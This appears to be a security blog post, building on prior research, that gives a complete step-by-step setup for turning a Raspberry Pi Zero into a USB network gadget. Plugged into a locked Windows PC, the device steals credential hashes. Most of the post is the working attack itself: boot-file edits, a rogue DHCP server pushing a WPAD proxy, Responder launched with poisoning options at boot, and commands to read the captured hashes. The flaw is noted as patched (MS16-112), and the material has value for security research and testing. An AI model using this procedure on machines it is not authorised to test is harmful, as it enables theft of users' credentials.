Update: CVE-2016-3302 / MS16-112 patch was released by Microsoft to fix the issue.

Introduction

This post is an extension to Rob Fuller’s (@mubix) work - https://room362.com/post/2016/snagging-creds-from-locked-machines/ to see how a Raspberry Pi Zero can be used for credential snagging. All credits go to @mubix for the original research. It is recommended to read mubix’s post (if you haven’t already !) before proceeding.

Prerequisites

Software

This will only work if the target Windows system has RNDIS drivers installed. The driver doesn’t seem to install automatically (like when you plug in a new mouse or any USB accessory) and has to be installed manually as explained here after booting up the Pi Zero for the first time.

Hardware

Raspberry Pi Zero (I have v1.3) Micro SD card (4GB or more) with Raspbian Jessie (I used Jessie Lite, Release date: 2016-05-27)

Micro USB cable (any cable that supports data transfer - try those coming with mobiles)

Procedure

I’m setting up the Pi Zero from my Windows machine (Windows 8.1). If you are working from a different OS, adopt any changes as necessary (Google is your best friend :)).

I assume that you have already installed the Raspbian Jessie Lite OS on the Micro SD card. On Windows, I prefer to use the Win32DiskImager. If you are not familiar with the OS flashing process, refer here.

Pi Zero USB gadget setup

Insert the Micro SD card with Raspbian OS into a suitable card reader and plug it into the Windows system. Open the boot partition in Windows explorer.

Two files need to be edited here:

config.txt

Append the following on a new line:

dtoverlay=dwc2

The resulting file looks like this.

cmdline.txt

Insert the following after rootwait:

modules-load=dwc2,g_ether

Be careful with the formatting on this one, the values are separated by spaces.

The resulting file looks like this.

Once both the files are edited and saved, eject the Micro SD card and insert into the Pi Zero slot. Connect the Pi Zero to the Windows system using the Micro USB cable.

Note: The cable has to be connected to the Micro USB port of Pi Zero to be used as a USB gadget.

Pi Zero packages setup

If the Pi Zero is not detected by Windows system after booting up, it means that RNDIS drivers are not installed. The drivers can be installed by following the procedure here.

Once the RNDIS devices are installed, the new USB Ethernet will be visible under Network Connections.

Note: I have renamed my adapter as PiZero and hence displayed above.

There are a number of packages that need to be installed on the Pi Zero to be used a credential snagging device. For this to happen, the Pi Zero will need Internet access.

I decided to share my LAN Internet with Pi Zero for this purpose. You can do the same or even share your Wi-Fi Internet.

At this stage you should be able to ping Pi Zero (hostname: raspberrypi.local)

Now, you can SSH to Pi Zero using the hostname.

The default credentials are:

username: pi password: raspberry

At this point, it is a good idea to check Internet connectivity for the Pi Zero (e.g. try pinging google.com). If the ping can resolve to IP (not getting a ping response is alright), you are good to go. If there is some connectivity error, try running:

sudo dhclient usb0

Now, proceed with running the below commands in order:

sudo apt-get update sudo apt-get install -y python git python-pip python-dev screen sqlite3 isc-dhcp-server python-crypto inotify-tools sudo mkdir tools cd tools sudo git clone https://github.com/lgandx/Responder.git responder

Configure a static IP

Open /etc/network/interfaces

sudo nano /etc/network/interfaces

Paste the below code at the end of the file:

auto usb0 allow-hotplug usb0 iface usb0 inet static address 192.168.2.201 netmask 255.255.255.0 gateway 192.168.2.1

DHCP server setup

Backup the existing config file and create a new one for our setup

sudo mv /etc/dhcp/dhcpd.conf /etc/dhcp/dhcpd.conf.bkp sudo nano /etc/dhcp/dhcpd.conf

Paste the below code:

ddns-update-style none; option domain-name "domain.local"; option domain-name-servers 192.168.2.201; default-lease-time 60; max-lease-time 72; # If this DHCP server is the official DHCP server for the local # network, the authoritative directive should be uncommented. authoritative; # Use this to send dhcp log messages to a different log file (you also # have to hack syslog.conf to complete the redirection). log-facility local7; # wpad option local-proxy-config code 252 = text; # A slightly different configuration for an internal subnet. subnet 192.168.2.0 netmask 255.255.255.0 { range 192.168.2.1 192.168.2.2; option routers 192.168.2.201; option local-proxy-config "http://192.168.2.201/wpad.dat"; }

Run scripts at boot

Open the /etc/rc.local file.

sudo nano /etc/rc.local

Paste the below code before exit 0.

# Clear leases rm -f /var/lib/dhcp/dhcpd.leases touch /var/lib/dhcp/dhcpd.leases # Start DHCP server /usr/sbin/dhcpd # Start Responder /usr/bin/screen -dmS responder bash -c 'cd /home/pi/tools/responder/; python Responder.py -I usb0 -f -w -r -d -F' # Monitor Responder.db and shutdown once the hashes are captured echo "Staring cred watch" >> /root/rc.log /usr/bin/screen -dmS notify bash -c 'while inotifywait -e modify /home/pi/tools/responder/Responder.db; do shutdown -h now; done'

Create logs for screen sessions

Create a logs folder:

sudo mkdir /root/logs

Add a .screenrc file

sudo nano /root/.screenrc

Paste the below code in .screenrc file:

# Logging deflog on logfile /root/logs/screenlog_$USER_.%H.%n.%Y%m%d-%0c:%s.%t.log

That concludes the setup.

Conclusion

Try plugging in the Pi Zero to a locked Windows PC and wait. If all goes well, the Responder.db file will be created at /home/pi/tools/responder/ and hashes will be stored.

The captured hashes can be viewed using sqlite3.

sqlite3 /home/pi/tools/responder/Responder.db select * from responder;

Also, check out Hackpi from wismna which automates all of the above and works without driver installation on Windows, Linux and MacOS. :)